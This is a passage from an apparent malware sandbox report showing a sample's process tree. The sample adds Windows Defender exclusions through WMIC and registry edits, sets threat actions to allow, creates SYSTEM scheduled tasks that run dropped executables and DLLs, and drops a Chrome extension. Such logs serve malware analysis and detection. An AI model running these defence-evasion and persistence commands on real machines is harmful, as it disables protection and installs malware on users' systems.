C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jLjeNaiUMFXhhNbk\kVxIoeLX\YLRnCRaKAUDEdEbE.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jLjeNaiUMFXhhNbk\kVxIoeLX\YLRnCRaKAUDEdEbE.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 10:43:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exe\" lW /iTkCdidGa 385135 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 3283⤵
- Program crash
-
C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exeC:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exe lW /iTkCdidGa 385135 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKPbLIPtdWjYWtgKbM"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\NDYUDM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rkutRMUCKyfxaPV2" /F /xml "C:\Program Files (x86)\TGSqLNfOU\mLutPpa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ymGpHCUadFDCAu" /F /xml "C:\Program Files (x86)\jbywMxbyABuU2\yldDABG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\MuqKIEN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cKCvNSfFKKPlDebmW2" /F /xml "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\oOEgyeT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "kIVMXXvuSFGZiLTKXPV2" /F /xml "C:\Program Files (x86)\vZXYUjRGERiGC\LqbEsou.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "WEqRGXvoovdTvsnPk" /SC once /ST 05:06:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll\",#1 /rHdidW 385135" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "WEqRGXvoovdTvsnPk"
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "LyeaCXeAXIXykqmfO"
-
[3] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 668
    - Program crash
-
[2] C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe
    C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe M5 /dNcdidaLlL 385135 /S
    - Executes dropped EXE
-
[3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
-
[6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process -WindowStyle Hidden gpupdate.exe /force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
-
[7] C:\Windows\SysWOW64\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 01:47:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe\" lW /Kthhdidkj 385135 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "LyeaCXeAXIXykqmfO"
-
[3] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 624
    - Program crash
-
[2] C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe
    C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe lW /Kthhdidkj 385135 /S
    - Checks computer location settings
    - Executes dropped EXE
    - Drops Chrome extension
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
-
[3] C:\Windows\SysWOW64\cmd.exe
